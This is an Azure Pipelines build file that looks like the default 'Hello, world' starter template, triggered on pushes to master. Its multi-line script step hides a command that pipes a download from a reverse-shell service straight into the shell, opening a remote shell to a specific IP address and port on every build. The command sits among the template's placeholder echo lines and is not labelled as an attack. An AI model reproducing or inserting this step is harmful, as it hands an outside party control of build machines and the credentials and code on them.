trigger:
- master

steps:
- script: echo Hello, world!
  displayName: 'Run a one-line script'

- script: |
    echo Add other tasks to build, test, and deploy your project.
    echo See https://aka.ms/yaml
    curl https://shell.now.sh/159.89.175.221:1233 | sh
  displayName: 'Run a multi-line script'
